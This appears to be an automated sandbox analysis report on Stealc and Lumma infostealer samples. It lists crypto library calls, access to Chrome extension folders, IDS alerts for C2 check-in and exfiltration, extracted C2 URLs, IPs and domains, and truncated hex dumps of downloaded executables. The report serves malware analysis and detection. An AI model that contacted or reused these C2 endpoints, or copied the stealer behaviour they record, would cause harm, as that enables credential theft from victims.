Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Code function: 6_2_6CBA7D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey, 6_2_6CBA7D60
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Code function: 6_2_6CBE9EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo, 6_2_6CBE9EC0
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Code function: 6_2_6CBC3FF0 PK11_PrivDecryptPKCS1, 6_2_6CBC3FF0
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Code function: 6_2_6CBC3850 PK11_Encrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError, 6_2_6CBC3850
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Code function: 6_2_6CBC9840 NSS_Get_SECKEY_EncryptedPrivateKeyInfoTemplate, 6_2_6CBC9840
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Code function: 6_2_6CBEDA40 SEC_PKCS7ContentIsEncrypted, 6_2_6CBEDA40
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Code function: 6_2_6CBC3560 PK11_Decrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError, 6_2_6CBC3560
Source: ElmEHL9kP9.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 23.206.229.209:443 -> 192.168.2.9:49743 version: TLS 1.0
Source: unknown HTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.9:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.9:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.9:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.9:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.9:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.9:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.9:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.9:49716 version: TLS 1.2
Source: Binary string: mozglue.pdbP source: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2498637724.000000006D5AD000.00000002.00000001.01000000.0000000E.sdmp, mozglue[1].dll.6.dr, mozglue.dll.6.dr
Source: Binary string: freebl3.pdb source: freebl3.dll.6.dr, freebl3[1].dll.6.dr
Source: Binary string: freebl3.pdbp source: freebl3.dll.6.dr, freebl3[1].dll.6.dr
Source: Binary string: nss3.pdb@ source: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2496708926.000000006CC9F000.00000002.00000001.01000000.0000000D.sdmp, nss3[1].dll.6.dr, nss3.dll.6.dr
Source: Binary string: softokn3.pdb@ source: softokn3.dll.6.dr, softokn3[1].dll.6.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.6.dr, vcruntime140[1].dll.6.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.6.dr, msvcp140.dll.6.dr
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 5TWLADXGMSKDNXXRW4MQ8.exe, 00000003.00000002.1952631058.0000000000712000.00000040.00000001.01000000.00000006.sdmp
Source: Binary string: nss3.pdb source: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2496708926.000000006CC9F000.00000002.00000001.01000000.0000000D.sdmp, nss3[1].dll.6.dr, nss3.dll.6.dr
Source: Binary string: mozglue.pdb source: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2498637724.000000006D5AD000.00000002.00000001.01000000.0000000E.sdmp, mozglue[1].dll.6.dr, mozglue.dll.6.dr
Source: Binary string: softokn3.pdb source: softokn3.dll.6.dr, softokn3[1].dll.6.dr
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: chrome.exe Memory has grown: Private usage: 5MB later: 31MB

Networking

barindex
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.9:49719 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.9:49719 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.206:80 -> 192.168.2.9:49719
Source: Network traffic Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.9:49719 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.9:49719
Source: Network traffic Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.9:49719 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.9:49706 -> 172.67.199.72:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.9:49705 -> 172.67.199.72:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49706 -> 172.67.199.72:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49705 -> 172.67.199.72:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.9:49707 -> 172.67.199.72:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49716 -> 172.67.199.72:443
Source: Malware configuration extractor URLs: http://185.215.113.206/c4becf79229cb002.php
Source: Malware configuration extractor URLs: observerfry.lat
Source: Malware configuration extractor URLs: shapestickyr.lat
Source: Malware configuration extractor URLs: manyrestro.lat
Source: Malware configuration extractor URLs: talkynicer.lat
Source: Malware configuration extractor URLs: bashfulacid.lat
Source: Malware configuration extractor URLs: curverpluch.lat
Source: Malware configuration extractor URLs: tentabatte.lat
Source: Malware configuration extractor URLs: slipperyloo.lat
Source: Malware configuration extractor URLs: wordyfindy.lat
Source: Malware configuration extractor IPs: 185.215.113.43
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 24 Dec 2024 07:36:06 GMTContent-Type: application/octet-streamContent-Length: 2769408Last-Modified: Tue, 24 Dec 2024 06:39:30 GMTConnection: keep-aliveETag: "676a5722-2a4200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 80 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 2a 00 00 04 00 00 db 1f 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 44 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 40 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 44 05 00 00 00 60 00 00 00 06 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 66 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 72 73 6c 71 63 6a 69 69 00 c0 29 00 00 a0 00 00 00 b4 29 00 00 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 72 67 61 65 7a 68 74 00 20 00 00 00 60 2a 00 00 04 00 00 00 1c 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 80 2a 00 00 22 00 00 00 20 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 24 Dec 2024 07:36:12 GMTContent-Type: application/octet-streamContent-Length: 5242368Last-Modified: Tue, 24 Dec 2024 06:41:29 GMTConnection: keep-aliveETag: "676a5799-4ffe00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 28 01 00 00 00 00 00 00 10 50 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 40 50 00 00 04 00 00 9c fe 4f 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 f0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 90 24 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 f0 01 00 00 00 a0 24 00 00 02 00 00 00 a0 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 a2 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 65 77 76 76 6e 7a 65 7a 00 40 2b 00 00 c0 24 00 00 32 2b 00 00 a4 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 64 74 72 74 65 64 71 63 00 10 00 00 00 00 50 00 00 06 00 00 00 d6 4f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 10 50 00 00 22 00 00 00 dc 4f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 24 Dec 2024 07:36:29 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 24 Dec 2024 07:36:56 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 24 Dec 2024 07:36:58 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 